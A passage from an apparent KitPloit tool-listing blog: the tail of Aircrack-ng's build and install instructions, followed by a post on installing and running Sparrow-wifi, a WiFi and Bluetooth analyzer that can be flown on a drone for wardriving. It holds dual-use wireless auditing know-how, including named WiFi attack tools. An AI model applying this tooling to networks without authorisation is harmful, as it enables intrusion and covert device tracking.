<pre><code>pkg install pkgconf shtool libtool gcc9 automake autoconf pcre sqlite3 openssl gmake hwloc cmocka</code></pre>
<br />
<b>DragonflyBSD</b><br />
<pre><code>pkg install pkgconf shtool libtool gcc8 automake autoconf pcre sqlite3 libgcrypt gmake cmocka</code></pre>
<br />
<b>OpenBSD</b><br />
<pre><code>pkg_add pkgconf shtool libtool gcc automake autoconf pcre sqlite3 openssl gmake cmocka</code></pre>
<br />
<b>OSX</b><br />
XCode, Xcode command line tools and HomeBrew are required.<br />
<pre><code>brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka</code></pre>
<br />
<b>Windows</b><br />
<br />
<b>Cygwin</b><br />
Cygwin requires the full path to the <code>setup.exe</code> utility, in order to automate the installation of the necessary packages. In addition, it requires the location of your installation, a path to the cached packages download location, and a mirror URL.<br />
An example of automatically installing all the dependencies is as follows:<br />
<pre><code>c:\cygwin\setup-x86.exe -qnNdO -R C:/cygwin -s http://cygwin.mirror.constant.com -l C:/cygwin/var/cache/setup -P autoconf -P automake -P bison -P gcc-core -P gcc-g++ -P mingw-runtime -P mingw-binutils -P mingw-gcc-core -P mingw-gcc-g++ -P mingw-pthreads -P mingw-w32api -P libtool -P make -P python -P gettext-devel -P gettext -P intltool -P libiconv -P pkg-config -P git -P wget -P curl -P libpcre-devel -P libssl-devel -P libsqlite3-devel</code></pre>
<br />
<b>MSYS2</b><br />
<pre><code>pacman -Sy autoconf automake-wrapper libtool msys2-w32api-headers msys2-w32api-runtime gcc pkg-config git python openssl-devel openssl libopenssl msys2-runtime-devel gcc binutils make pcre-devel libsqlite-devel</code></pre>
<br />
<span style="font-size: large;"><b>Compiling</b></span><br />
To build <code>aircrack-ng</code>, the Autotools build system is utilized. Autotools replaces the older method of compilation.<br />
<strong>NOTE</strong>: If utilizing a developer version, eg: one checked out from source control, you will need to run a pre-<code>configure</code> script. The script to use is one of the following: <code>autoreconf -i</code> or <code>env NOCONFIGURE=1 ./autogen.sh</code>.<br />
First, <code>./configure</code> the project for building with the appropriate options specified for your environment:<br />
<pre><code>./configure <options></code></pre>
<strong>TIP</strong>: If the above fails, please see above about developer source control versions.<br />
Next, compile the project (respecting if <code>make</code> or <code>gmake</code> is needed):<br />
<ul>
<li> Compilation:<br />
<code>make</code><br />
</li>
<li> Compilation on *BSD or Solaris:<br />
<code>gmake</code><br />
</li>
</ul>
Finally, the additional targets listed below may be of use in your environment:<br />
<ul>
<li> Execute all unit testing:<br />
<code>make check</code><br />
</li>
<li> Execute all integration testing (requires root):<br />
<code>make integration</code><br />
</li>
<li> Installing:<br />
<code>make install</code><br />
</li>
<li> Uninstall:<br />
<code>make uninstall</code><br />
</li>
</ul>
<br />
<b><code>./configure</code> flags</b><br />
When configuring, the following flags can be used and combined to adjust the suite to your choosing:<br />
<ul>
<li> <strong>with-airpcap=DIR</strong>: needed for supporting airpcap devices on windows (cygwin or msys2 only) Replace DIR above with the absolute location to the root of the extracted source code from the Airpcap CD or downloaded SDK available online. Required on Windows to build <code>besside-ng</code>, <code>besside-ng-crawler</code>, <code>easside-ng</code>, <code>tkiptun-ng</code> and <code>wesside-ng</code> when building experimental tools. The developer pack (Compatible with version 4.1.1 and 4.1.3) can be downloaded at <a href="https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html" rel="nofollow" target="_blank" title="https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html">https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html</a><br />
</li>
<li> <strong>with-experimental</strong>: needed to compile <code>tkiptun-ng</code>, <code>easside-ng</code>, <code>buddy-ng</code>, <code>buddy-ng-crawler</code>, <code>airventriloquist</code> and <code>wesside-ng</code>. libpcap development package is also required to compile most of the tools. If not present, not all experimental tools will be built. On Cygwin, libpcap is not present and the Airpcap SDK replaces it. See --with-airpcap option above.<br />
</li>
<li> <strong>with-ext-scripts</strong>: needed to build <code>airoscript-ng</code>, <code>versuck-ng</code>, <code>airgraph-ng</code> and <code>airdrop-ng</code>. Note: Each script has its own dependencies.<br />
</li>
<li> <strong>with-gcrypt</strong>: Use libgcrypt crypto library instead of the default OpenSSL. And also use internal fast sha1 implementation (borrowed from GIT) Dependency (Debian): libgcrypt20-dev<br />
</li>
<li> <strong>with-duma</strong>: Compile with DUMA support. DUMA is a library to detect buffer overruns and under-runs. Dependencies (debian): duma<br />
</li>
<li> <strong>disable-libnl</strong>: Set-up the project to be compiled without libnl (1 or 3). Linux option only.<br />
</li>
<li> <strong>without-opt</strong>: Do not enable stack protector (on GCC 4.9 and above).<br />
</li>
<li> <strong>enable-shared</strong>: Make OSdep a shared library.<br />
</li>
<li> <strong>disable-shared</strong>: When combined with <strong>enable-static</strong>, it will statically compile Aircrack-ng.<br />
</li>
<li> <strong>with-avx512</strong>: On x86, add support for AVX512 instructions in aircrack-ng. Only use it when the current CPU supports AVX512.<br />
</li>
<li> <strong>with-static-simd=</strong>: Compile a single optimization in aircrack-ng binary. Useful when compiling statically and/or for space-constrained devices. Valid SIMD options: x86-sse2, x86-avx, x86-avx2, x86-avx512, ppc-altivec, ppc-power8, arm-neon, arm-asimd. Must be used with --enable-static --disable-shared. When using those 2 options, the default is to compile the generic optimization in the binary. --with-static-simd merely allows to choose another one.<br />
</li>
</ul>
<br />
<b>Examples:</b><br />
<ul>
<li> Configure and compiling:<br />
<pre><code>./configure --with-experimental
make</code></pre>
</li>
<li> Compiling with gcrypt:<br />
<pre><code>./configure --with-gcrypt
make</code></pre>
</li>
<li> Installing:<br />
<code>make install</code><br />
</li>
<li> Installing (strip binaries):<br />
<code>make install-strip</code><br />
</li>
<li> Installing, with external scripts:<br />
<pre><code>./configure --with-experimental --with-ext-scripts
make
make install</code></pre>
</li>
<li> Testing (with sqlite, experimental and pcre)<br />
<pre><code>./configure --with-experimental
make
make check</code></pre>
</li>
<li> Compiling on OS X with macports (and all options):<br />
<pre><code>./configure --with-experimental
gmake</code></pre>
</li>
<li> Compiling on OS X 10.10 with XCode 7.1 and Homebrew:<br />
<pre><code>env CC=gcc-4.9 CXX=g++-4.9 ./configure
make
make check</code></pre>
<em>NOTE</em>: Older XCode ships with a version of LLVM that does not support CPU feature detection; which causes the <code>./configure</code> to fail. To work around this older LLVM, it is required that a different compile suite is used, such as GCC or a newer LLVM from Homebrew.<br />
If you wish to use OpenSSL from Homebrew, you may need to specify the location to its' installation. To figure out where OpenSSL lives, run:<br />
<code>brew --prefix openssl</code><br />
Use the output above as the DIR for <code>--with-openssl=DIR</code> in the <code>./configure</code> line:<br />
<pre><code>env CC=gcc-4.9 CXX=g++-4.9 ./configure --with-openssl=DIR
make
make check</code></pre>
</li>
<li> Compiling on FreeBSD with gcc9<br />
<pre><code>env CC=gcc9 CXX=g++9 MAKE=gmake ./configure
gmake</code></pre>
</li>
<li> Compiling on Cygwin with Airpcap (assuming Airpcap devpack is unpacked in <a href="https://www.kitploit.com/search/label/Aircrack-ng" target="_blank" title="Aircrack-ng">Aircrack-ng</a> directory)<br />
<pre><code>cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src
cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-osdep
cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-crypto
cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-util
dlltool -D Airpcap_Devpack/bin/x86/airpcap.dll -d build/airpcap.dll.def -l Airpcap_Devpack/bin/x86/libairpcap.dll.a
autoreconf -i
./configure --with-experimental --with-airpcap=$(pwd)
make</code></pre>
</li>
<li> Compiling on DragonflyBSD with gcrypt using GCC 8<br />
<pre><code>autoreconf -i
env CC=gcc8 CXX=g++8 MAKE=gmake ./configure --with-experimental --with-gcrypt
gmake</code></pre>
</li>
<li> Compiling on OpenBSD (with autoconf 2.69 and automake 1.16)<br />
<pre><code>export AUTOCONF_VERSION=2.69
export AUTOMAKE_VERSION=1.16
autoreconf -i
env MAKE=gmake ./configure
gmake</code></pre>
</li>
<li> Compiling and debugging aircrack-ng<br />
<pre><code>export CFLAGS='-O0 -g'
export CXXFLAGS='-O0 -g'
./configure
make
LD_LIBRARY_PATH=.libs gdb --args ./aircrack-ng [PARAMETERS]</code></pre>
</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Packaging</b></span><br />
Automatic detection of CPU optimization is done at run time. This behavior <strong>is</strong> desirable when packaging Aircrack-ng (for a Linux or other distribution.)<br />
Also, in some cases it may be desired to provide your own flags completely and not having the suite auto-detect a number of optimizations. To do this, add the additional flag <code>--without-opt</code> to the <code>./configure</code> line:<br />
<code>./configure --without-opt</code><br />
<br />
<span style="font-size: x-large;"><b>Using precompiled binaries</b></span><br />
<br />
<span style="font-size: large;"><b>Linux/BSD</b></span><br />
<ul>
<li>Use your package manager to download aircrack-ng</li>
<li>In most cases, they have an old version.</li>
</ul>
<br />
<span style="font-size: large;"><b>Windows</b></span><br />
<ul>
<li>Install the appropriate "monitor" driver for your card (standard drivers doesn't work for capturing data).</li>
<li>aircrack-ng suite is command line tools. So, you have to open a commandline <code>Start menu -> Run... -> cmd.exe</code> then use them</li>
<li>Run the executables without any parameters to have help</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Documentation</b></span><br />
Documentation, tutorials, ... can be found on <a href="https://aircrack-ng.org/" rel="nofollow" target="_blank" title="https://aircrack-ng.org">https://aircrack-ng.org</a><br />
See also manpages and the forum.<br />
For further information check the <a href="https://github.com/aircrack-ng/aircrack-ng/blob/master/README" rel="nofollow" target="_blank" title="README">README</a> file<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/aircrack-ng/aircrack-ng" rel="nofollow" target="_blank" title="Download Aircrack-Ng">Download Aircrack-Ng</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-34470887771097472522019-11-06T09:00:00.000-03:002019-11-06T09:00:10.767-03:00Sparrow-Wifi - Next-Gen GUI-based WiFi And Bluetooth Analyzer For Linux<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/--ZuFJMevyhU/XbTnZx4pyAI/AAAAAAAAQvM/q0w6oXTauqgGubM4cp2j9HcifEwESgAcwCNcBGAsYHQ/s1600/sparrow-wifi_1_sparrow-screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="838" data-original-width="1440" height="372" src="https://1.bp.blogspot.com/--ZuFJMevyhU/XbTnZx4pyAI/AAAAAAAAQvM/q0w6oXTauqgGubM4cp2j9HcifEwESgAcwCNcBGAsYHQ/s640/sparrow-wifi_1_sparrow-screenshot.png" width="640" /></a></div>
<br />
Sparrow-wifi has been built from the ground up to be the next generation 2.4 GHz and 5 GHz Wifi spectral awareness tool. At its most basic it provides a more comprehensive GUI-based replacement for tools like inSSIDer and linssid that runs specifically on linux. In its most comprehensive use cases, sparrow-wifi integrates wifi, software-defined radio (hackrf), advanced bluetooth tools (traditional and Ubertooth), traditional GPS (via gpsd), and drone/rover GPS via mavlink in one solution.<br />
<a name='more'></a><br />
[NOTE: Check the <a href="https://www.kitploit.com/search/label/Raspberry%20Pi" target="_blank" title="Raspberry Pi">Raspberry Pi</a> section for updates. A setup script is now included to get the project running on Raspbian Stretch.]<br />
Written entirely in Python3, Sparrow-wifi has been designed for the following scenarios:<br />
<ul>
<li>Basic wifi SSID identification</li>
<li>Wifi source hunt - Switch from normal to hunt mode to get multiple samples per second and use the telemetry windows to track a wifi source</li>
<li>2.4 GHz and 5 GHz spectrum view - Overlay spectrums from Ubertooth (2.4 GHz) or HackRF (2.4 GHz and 5 GHz) in real time on top of the wifi spectrum (invaluable in poor connectivity troubleshooting when overlapping wifi doesn't seem to be the cause)</li>
<li>Bluetooth identification - LE advertisement listening with standard bluetooth, full promiscuous mode in LE and classic bluetooth with Ubertooth</li>
<li>Bluetooth source hunt - Track LE advertisement sources or iBeacons with the telemetry window</li>
<li>iBeacon advertisement - Advertise your own iBeacons</li>
<li>Remote operations - An agent is included that provides all of the GUI functionality via a remote agent the GUI can talk to.</li>
<li>Drone/Rover operations - The agent can be run on systems such as a Raspberry Pi and flown on a drone (its made several flights on a Solo 3DR), or attached to a rover in either GUI-controlled or autonomous scan/record modes.</li>
<li>The remote agent is JSON-based so it can be integrated with other applications</li>
<li>Import/Export - Ability to import and export to/from CSV and JSON for easy integration and revisiualization. You can also just run 'iw dev scan' and save it to a file and import that as well.</li>
<li>Produce Google maps when GPS coordinates are available for both discovered SSID's / bluetooth devices or to plot the wifi telemetry over time.</li>
</ul>
A few sample screenshots. The first is the main window showing a basic wifi scan, the second shows the telemetry/tracking window used for both Wifi and bluetooth tracking.<br />
<div align="center">
</div>
<div align="center">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-WsnKX3Wj6fA/XbTngbktahI/AAAAAAAAQvQ/iNbmnwYFVpcFK66tp0mUX1VAbqKryNPDACNcBGAsYHQ/s1600/sparrow-wifi_2_telemetry-screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="960" height="418" src="https://1.bp.blogspot.com/-WsnKX3Wj6fA/XbTngbktahI/AAAAAAAAQvQ/iNbmnwYFVpcFK66tp0mUX1VAbqKryNPDACNcBGAsYHQ/s640/sparrow-wifi_2_telemetry-screenshot.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/--ZuFJMevyhU/XbTnZx4pyAI/AAAAAAAAQvM/b7ycS8EhAccwAx3CtWf3mOz1Xr1rc7xwQCEwYBhgL/s1600/sparrow-wifi_1_sparrow-screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="838" data-original-width="1440" height="372" src="https://1.bp.blogspot.com/--ZuFJMevyhU/XbTnZx4pyAI/AAAAAAAAQvM/b7ycS8EhAccwAx3CtWf3mOz1Xr1rc7xwQCEwYBhgL/s640/sparrow-wifi_1_sparrow-screenshot.png" width="640" /></a></div>
</div>
<span style="font-size: large;"><b>Installation</b></span><br />
sparrow-wifi uses python3, qt5, and qtchart for the UI. On a standard debian variant you will may already have python3 and qt5 installed. The only addition to run it is qtchart. The following commands should get you up and running with wifi on both Ubuntu and Kali linux:<br />
<pre><code>sudo apt-get install python3-pip gpsd gpsd-clients python3-tk python3-setuptools
sudo pip3 install QScintilla PyQtChart gps3 dronekit manuf python-dateutil numpy matplotlib</code></pre>
Some folks have been running sparrow with a python virtualenv, if you'd like to run it in an isolated python environment, the following sequence should get you up and running:<br />
<pre><code>git clone https://github.com/ghostop14/sparrow-wifi
cd sparrow-wifi
virtualenv --python=python3 $HOME/sparrow
source $HOME/sparrow/bin/activate
pip3 install gps3 python-dateutil requests pyqt5 pyqtchart numpy matplotlib
sudo python3 sparrow-wifi.py</code></pre>
NOTE: If you're trying to run on a Raspberry Pi, see the Raspberry Pi section below. Only the remote agent has been run on a Pi, some of the GUI components wouldn't install / set up on the ARM platform.<br />
<br />
<span style="font-size: large;"><b>Running sparrow-wifi</b></span><br />
Because it needs to use the standard command-line tool 'iw' for wifi scans, you will need to run sparrow-wifi as root. Simply run this from the cloned directory:<br />
<pre><code>sudo ./sparrow-wifi.py</code></pre>
<br />
<span style="font-size: large;"><b>WiFi Notes</b></span><br />
One item of note on wifi scanning, especially in the 5 GHz range is to find a card that works. It's not so much an issue with the 'iw' tool, however in more advanced configurations where monitoring mode is required, it can be an issue.<br />
<br />
<span style="font-size: large;"><b>Bluetooth</b></span><br />
For folks familiar with WiFi but 'new' to <a href="https://www.kitploit.com/search/label/Bluetooth" target="_blank" title="Bluetooth">Bluetooth</a> scanning, bluetooth is different enough that some of what you may want to see based on wifi won't be available (and may seem a bit frustrating at first). It all fundamentally comes down to how bluetooth operates. Bluetooth uses frequency hopping across the entire 2.4 GHz range, so it doesn't present in nice clean single channel buckets like wifi does. To complicate things there is a low energy (BTLE) and Classic mode that are incompatible from an RF perspective, so generally a bluetooth adapter can only scan for one type or the other at any given time.<br />
Bluetooth devices are also generally only discoverable when advertising (think broadcasting broadcasting). The only other way to find bluetooth devices is with a device that can sniff all bluetooth packets out of the air, which standard bluetooth adapters don't do. Which is where hardware like an Ubertooth come in to get a better view of the bluetooth environment. And of course then if they're not transmitting you wouldn't have anything to go off of. And if you have to catch packets being transmitted you may need to scan/linger longer to see it, increasing scan frame rates to as long as 30 seconds to a minute.<br />
So with all that said, with a standard / built-in bluetooth adapter, Sparrow-wifi can do advertisement scanning for bluetooth low energy (BTLE) devices. If they're advertising their transmit power, it'll attempt a range calculation. This what the latest iBeacon solutions and products do to be physically locatable. However with multi-pathing, internal walls, etc. don't expect an extreme level of accuracy. As an added bonus, sparrow-wifi can also advertise its own iBeacons for tracking (this could be useful from a remote agent to turn on location discovery). However not all bluetooth cards will advertise transmit power so you may not always get range. If you do have an Ubertooth, sparrow-wifi can use it for promiscuous discovery of both BTLE and classic bluetooth devices. Of course there's a tradeoff. Traditional LE scans update faster for tracking which is easier for bluetooth 'hunt', however promiscuous mode can identify more devices at the expense of needing to linger lon ger to listen.<br />
If you would like to scan for bluetooth, you'll need a few things:<br />
<ol>
<li>A bluetooth adapter (test with 'hcitool dev' to make sure it shows up). With an adapter you can do basic BTLE advertisement and iBeacon scans.</li>
<li>[Optional ] An Ubertooth for promiscuous discovery scans (BTLE and Classic Bluetooth) <ul>
<li>Ubertooth tools installed and functioning (you can test it with ubertooth-specan-ui)</li>
<li>Blue Hydra installed into /opt/bluetooth/blue_hydra (mkdir /opt/bluetooth && cd /opt/bluetooth && git clone <a href="https://github.com/pwnieexpress/blue_hydra.git" rel="nofollow" target="_blank" title="https://github.com/pwnieexpress/blue_hydra.git">https://github.com/pwnieexpress/blue_hydra.git</a>). Then make sure you've followed the blue_hydra installation instructions. You can test it with bin/blue_hydra. This msut be in /opt/bluetooth/blue_hydra or the app won't find it.</li>
</ul>
</li>
</ol>
I strongly recommend running 'hcitool lescan' from the command-line first to make sure everything is working okay. If you have an Ubertooth, run ubertooth-specan-ui and run blue_hydra to make sure those tools work properly before attempting in sparrow-wifi.<br />
Some troubleshooting tips:<br />
<ul>
<li>If you don't see any devices with a basic LE advertisement scan, try "hcitool lescan" from the command-line and see if you get any errors. If so address them there. Sometimes a quick "hciconfig hci0 down && hciconfig hci0 up" can fix it.</li>
<li>If you have an Ubertooth and don't see any spectrum try running ubertooth-specan or ubertooth-specan-ui from the command line. If you get any errors address them there.</li>
</ul>
<br />
<span style="font-size: large;"><b>Spectrum</b></span><br />
Near real-time spectral overlays in both spectrums is one feature that differentiates sparrow-wifi from other wifi tools. To get spectral overlays, two options are available. The less expensive approach is to use an Ubertooth One. Spectrum scanning is one of the features of the hardware with 1 MHz channel resolution. The downside is that Ubertooth is just focused on the 2.4 GHz spectrum (after all that's where bluetooth functions), so you won't be able to scan the 5 GHz range. If you have more experience and/or hardware focused on software-defined radio (SDR) and have a HackRF One available, while a little more expensive an option, you can scan both the 2.4 (with 0.5 MHz resolution) and 5 GHz (with 2 MHz resolution) spectrum ranges. The next 2 sections provide some details unique to each hardware device. In general the goal of sparrow-wifi were frame rates of about 10 fps local and 5 fps via the remote agent (depending on remote hardware and network connectivity).<br />
The following screenshot shows a 2.4 GHz perspective with an Ubertooth spectrum (with 1 MHz bins) overlay. It's quite interesting to watch the spectrum when bluetooth devices are also active. You can observe the bluetooth channel hopping in the spectrum. There are other protocols such as zigbee and other IoT protocols, even cordless phones that may also show up in the 2.4 GHz spectrum that would not otherwise show up on a wifi-only view. Having the spectral overlay provides an invaluable perspective on other interference in the spectrum for troubleshooting say for instance if no overlapping wireless channels seem to be the source of poor connectivity.<br />
<div align="center">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-oPEkaHaTmN4/XbTnm_kybMI/AAAAAAAAQvU/hhvCXwxiIT4vkktjzbEIOCDQVxBwRZHggCNcBGAsYHQ/s1600/sparrow-wifi_3_spectrum-screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="367" data-original-width="705" height="332" src="https://1.bp.blogspot.com/-oPEkaHaTmN4/XbTnm_kybMI/AAAAAAAAQvU/hhvCXwxiIT4vkktjzbEIOCDQVxBwRZHggCNcBGAsYHQ/s640/sparrow-wifi_3_spectrum-screenshot.png" width="640" /></a></div>
</div>
<b>Ubertooth One</b><br />
Once you get an Ubertooth One, the first thing you should do is download and build the latest tools and flash it with the latest firmware version. With that in place, try running ubertooth-specan-ui for a nice quick graphical spectrum display. If this is working, the Ubertooth should work fine in sparrow-wifi (just close any running Ubertooth tools before attempting to display the spectrum). Sparrow-wifi will automatically detect that the Ubertooth is present and the tools are available on startup and enable the appropriate menu choices. Note that if you start sparrow-wifi without the Ubertooth connected, just close sparrow-wifi and reopen it and it should see it. You can manually test it with lsusb to see that the Ubertooth is present.<br />
<br />
<b>HackRF One</b><br />
HackRF support has been added to take advantage of the hackrf_sweep capabilities added to the HackRF firmware. With a HackRF you can sweep the entire range for a view of the spectrum. While hackrf_sweep can sweep from 2.4 GHz through 5 GHz, the frame rate is too slow (like 1 frame every 2 seconds), so you can use it for only one band at a time. With that said, if you have both an Ubertooth and a HackRF, you could use the Ubertooth to display the 2.4 GHz band and the HackRF to display the 5 GHz band simultaneously.<br />
IMPORTANT: Standard RF and antenna rules apply. If you want to monitor either band, make sure you have an antenna capable of receiving in that band (the standard telescoping HackRF antenna probably won't work as it's only rated up to 1 GHz). And if you do want to grab an external dual-band antenna used on wireless cards, just note that the connector polarity is typically reversed (rp-sma rather than the sma connector on the HackRF) so you'll need to grab an adapter to connect it to the HackRF (they're only a couple dollars on Amazon). An RP-SMA antenna will screw on to the SMA connector but the center pin isn't there so you won't actually receive anything. Just a word of caution.<br />
Notes: The 5 GHz spectrum, even with a dual-band antenna can be difficult to see signals in the same way as in 2.4 GHz. The SNR for 5 GHz seems much lower than 2.4 GHz. Some of this could be attributed to the HackRF as 5 GHz is getting towards the edge of its useable frequency range, while part of it can also be attributed to 5 GHz not penetrating walls, ceilings, etc. as well as 2.4 GHz. Sometimes the 5 GHz band shows better in a waterfall plot to distinguish an active signal, but if that's what you need try the tool qspectrumanalyzer.<br />
Troubleshooting tips:<br />
<ul>
<li>If you don't see any spectrum at all try running hackrf_sweep from the command-line. If you get any errors, address them there.</li>
</ul>
<br />
<span style="font-size: large;"><b>GPS</b></span><br />
Sparrow-wifi relies on gpsd to provide standard GPS communications. During testing there were a number of GPS-related issues worth being aware of. First in terms of GPS receivers, make sure you get one that works with gpsd. I've tested it with a GlobalSAT ND-105C Micro USB receiver. I've also used a GPS app on an android device to provide GPS over bluetooth (although this takes some tinkering, and would preclude using the bluetooth adapter for scanning while using it for GPS).<br />
So the first important note is on the GPS receiver side. If you are planning on using the GPS receiver indoors, you may need to make sure the GPS you get specifically states it will work indoors. Anyone with a Garmin or other outdoor sports GPS system may be aware that they tend to not synchronize with satellites well while indoors. The stock GPS on the Solo 3DR drone is the same way as is the GlobalSAT receiver. When they're close to windows, etc. they may finally sync up after some time, but reception indoors isn't great and if you're in an office building or other metal/concrete structure, the receiver may have a tough time receiving the satellite signals. So keep this in mind when picking a GPS receiver.<br />
In terms of getting the receiver to work with gpsd, there were some challenges that were encountered getting it to work. First, the easiest way to test the gps is to stop the gpsd service (service gpsd stop), and run gpsd from the command-line with debugging enabled. If you have a USB-based GPS you should see a device that looks like /dev/ttyUSB0 show up when it is connected. If that's the case, a command similar to this would start gpsd in the foreground for a quick test:<br />
<pre><code>gpsd -D 2 -N /dev/ttyUSB0</code></pre>
If you see good data, you can daemonize it by just removing the -N parameter. On Ubuntu, editing /etc/default/gpsd and specifically putting /dev/ttyUSB0 in the device parameter and restarting the service worked fine. However on Kali linux and the Raspberry Pi, the same process didn't work as if the gpsd service was ignoring the parameter. In those cases, the GPS service was set to not auto-start and the gpsd daemon was started manually from the command-line with the command 'gpsd /dev/ttyUSB0'.<br />
Once the daemon is up and working, xgps is a tool that's part of the gpsd-clients package that provides a really nice GUI to check GPS and satellite status. If you run xgps it will tell you when the receiver is synchronized and give you a number of other parameters to make sure it is working correctly. If everything looks like it's working with xgps, then sparrow-wifi should be able to pull the data as any other gpsd client would.<br />
<br />
<span style="font-size: large;"><b>Running sparrow-wifi remote agent</b></span><br />
Because the agent has the same <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> as the GUI in terms of system access, you will need to run the agent as root as well. Simply run:<br />
<pre><code>sudo ./sparrowwifiagent.py</code></pre>
By default it will listen on port 8020. There are a number of options that can be seen with --help, and a local configuration file can also be used.<br />
An alternate port can also be specified with:<br />
<pre><code>sudo ./sparrowwifiagent.py --port=&lt;myport&gt;</code></pre>
There are a number of options including IP connection <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> and record-local-on-start. Here's the --help parameter list at this time:<br />
<pre><code>usage: sparrowwifiagent.py [-h] [--port PORT] [--allowedips ALLOWEDIPS]
[--mavlinkgps MAVLINKGPS] [--sendannounce]
[--userpileds] [--recordinterface RECORDINTERFACE]
[--ignorecfg] [--cfgfile CFGFILE]
[--delaystart DELAYSTART]
Sparrow-wifi agent
optional arguments:
-h, --help show this help message and exit
--port PORT Port for HTTP server to listen on
--allowedips ALLOWEDIPS
IP addresses allowed to connect to this agent. Default
is any. This can be a comma-separated list for
multiple IP addresses
--mavlinkgps MAVLINKGPS
Use Mavlink (drone) for GPS. Options are: '3dr' for a
Solo, 'sitl' for local simulator, or full connection
string ('udp/tcp:<ip>:<port>' such as:
'udp:10.1.1.10:14550')
--sendannounce Send a UDP broadcast packet on the specified port to
announce presence
--userpileds Use RPi LEDs to signal state. Red=GPS
[off=None,blinking=Unsynchronized,solid=synchronized],
Green=Agent Running [On=Running, blinking=servicing
HTTP request]
--recordinterface RECORDINTERFACE
Automatically start recording locally with the given
wireless interface (headless mode) in a recordings
directory
--ignorecfg Don't load any config files (useful for overriding
and/or testing)
--cfgfile CFGFILE Use the specified config file rather than the default
sparrowwifiagent.cfg file
--delaystart DELAYSTART
Wait <delaystart> seconds before initializing</code></pre>
<br />
<span style="font-size: large;"><b>Drone / Rover Operations</b></span><br />
Being able to "war fly" (the drone equivilent of "wardriving" popular in the wifi world) was another goal of the project. As a result, being able to have a lightweight agent that could be run on a small platform such as a Raspberry Pi that could be mounted on a drone was incorporated into the design requirements. The agent has been flown successfully on a Solo 3DR drone (keeping the overall weight under the 350 g payload weight).<br />
The Solo was a perfect choice for the project because the controller acts as a wifi access point and communicates with the drone over a traditional IP network using the mavlink protocol. This allows other devices such as laptops, tablets, and the Raspberry Pi to simply join the controller wifi network and have IP connectivity. This was important for field operations as it kept the operational complexity down.<br />
Because these drones have onboard GPS as part of their basic functionality, it's possible over mavlink (with the help of dronekit) to pull GPS coordinates directly from the drone's GPS. This helps keep the overall payload weight down as an additional GPS receiver does not need to be flown as part of the payload. Also, in order to keep the number of tasks required by the drone operator to a minimum during flight, the agent can be started, wait for the drone GPS to be synchronized, use the Raspberry Pi lights to signal operational readiness, and automatically start recording wifi networks to a local file. The GUI then provides an interface to retrieve those remotely saved files and pull back for visualization.<br />
This scenario has been tested with a Cisco AE1000 dual-band adapter connected to the Pi. Note though that I ran into an issue scanning 5 GHz from the Pi that I finally found the solution for. With a dual-band adapter, if you don't disable the internal Pi wireless adapter you won't get any 5 GHz results (this is a known issue). What you'll need to do is disable the onboard wifi by editing /boot/config.txt and adding the following line then reboot 'dtoverlay=pi3-disable-wifi'. Now you'll be able to scan both bands from the Pi.<br />
The quickest way to start the agent on a Raspberry Pi (IMPORTANT: see the Raspbery Pi section first, if you're running Raspian Squeeze, you'll need to build Python 3.5 first (Stretch already has 3.5) to run the agent since the subprocess commands used were initially removed from python3 then put back in 3.5) and pull GPS from a Solo drone is to start it with the following command on the Pi:<br />
<pre><code>sudo python3.5 ./sparrowwifiagent.py --userpileds --sendannounce --mavlinkgps 3dr</code></pre>
The Raspberry Pi red and green LED's will then be used as visual indicators transitioning through the following states:<br />
<ol>
<li>Both lights off - Initializing</li>
<li>Red LED Heartbeat - Connected to the drone (dronekit vehicle connect was successful)</li>
<li>Red LED Solid - Connected and GPS synchronized and operational (the drone can take a couple of minutes for the GPS to settle as part of its basic flight initialization)</li>
<li>Green LED Solid - Agent HTTP server is up and the agent is operational and ready to serve requests</li>
</ol>
Note: Without the mavlink setting, if using a local GPS module, the red LED will transition through the same heartbeat=GPS present but unsynchronized, solid = GPS synchronized states.<br />
If you don't have a second set of hands while flying your drone and want to fly the Pi without having to worry about the agent, you can start the agent in auto-record mode. There are a few scripts in the scripts directory that start with 'rpi' that can be scheduled for monitoring the agent and starting it as appropriate. The overall intention is a headless configuration where the Pi starts up (you'll need to configure the wifi on the Pi ahead of time to automatically connect to the controller wifi network), the agent will be started and automatically go into wifi record mode using the drone's gps for recording. Once you're done the sparrow-wifi agent menu gives you a screen to manage the files in the recordings directory on the agent and download or delete the files there. These scripts in the scripts directory are just samples. It is highly recommended that you customize them and the Pi integration to meet your specific needs, and by all means keep safety (and federal regula tions) in mind when doing anything with a drone as you're responsible for both.<br />
<br />
<span style="font-size: large;"><b>Raspberry Pi Notes</b></span><br />
<br />
<b>Raspbian Stretch</b><br />
